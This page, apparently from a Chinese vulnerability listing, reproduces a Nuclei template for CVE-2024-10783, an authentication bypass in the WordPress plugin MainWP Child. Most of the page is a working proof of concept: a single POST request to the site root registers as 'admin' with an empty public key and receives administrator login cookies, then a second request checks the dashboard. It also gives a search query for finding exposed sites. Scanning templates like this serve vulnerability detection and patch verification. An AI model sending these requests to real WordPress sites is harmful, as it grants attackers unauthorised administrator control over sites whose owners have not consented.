CVE-2024-10783: WordPress Plugin MainWP Child - Authentication Bypass

日期: 2025-08-01 | 影响软件: WordPress Plugin MainWP Child | POC: 已公开

漏洞描述

The plugin is vulnerable to an authentication bypass that allows an unauthenticated user to login as an administrator without providing a password. This vulnerability is only exploitable when the plugin has not been connected to a MainWP Dashboard and the "Require unique security ID" option is not enabled (it is disabled by default).

PoC代码[已公开]

id: CVE-2024-10783

info:
  name: WordPress Plugin MainWP Child - Authentication Bypass
  author: Sean Murphy,iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    The plugin is vulnerable to an authentication bypass that allows an unauthenticated user to login as an administrator without providing a password. This vulnerability is only exploitable when the plugin has not been connected to a MainWP Dashboard and the "Require unique security ID" option is not enabled (it is disabled by default).
  reference:
    - https://wpscan.com/vulnerability/1898d4f4-1874-4d00-8930-15774d57c9ed/
    - https://plugins.trac.wordpress.org/browser/mainwp-child/tags/5.2/class/class-mainwp-child.php#L76
    - https://plugins.trac.wordpress.org/browser/mainwp-child/tags/5.2/class/class-mainwp-connect.php#L69
    - https://plugins.trac.wordpress.org/browser/mainwp-child/tags/5.2/class/class-mainwp-connect.php#L788
    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3197586%40mainwp-child&new=3197586%40mainwp-child&sfp_email=&sfph_mail=
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2024-10783
    cwe-id: CWE-862
    epss-score: 0.26953
    epss-percentile: 0.96155
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/plugins/mainwp-child/"
  tags: cve,cve2024,wp,mainwp-child,wpscan,wordpress,wp-plugin,auth-bypass,vuln

flow: http(1) && http(2)

variables:
  username: admin

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        function=register&user={{username}}&pubkey=

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - wordpress_logged_in
        internal: true

      - type: word
        part: body
        words:
          - '<mainwp>'
        internal: true

  - raw:
      - |
        GET /wp-admin/index.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Howdy, {{username}}'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202b952add0c8ecbc86d0e39c37de74f8384bfb9f6c8791e2155316570dac37c1d022100dd930fd603bfd28fb3e30a121180f093e49cd0e19bd6f496f646d61ecbbd1f6e:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-10783.yaml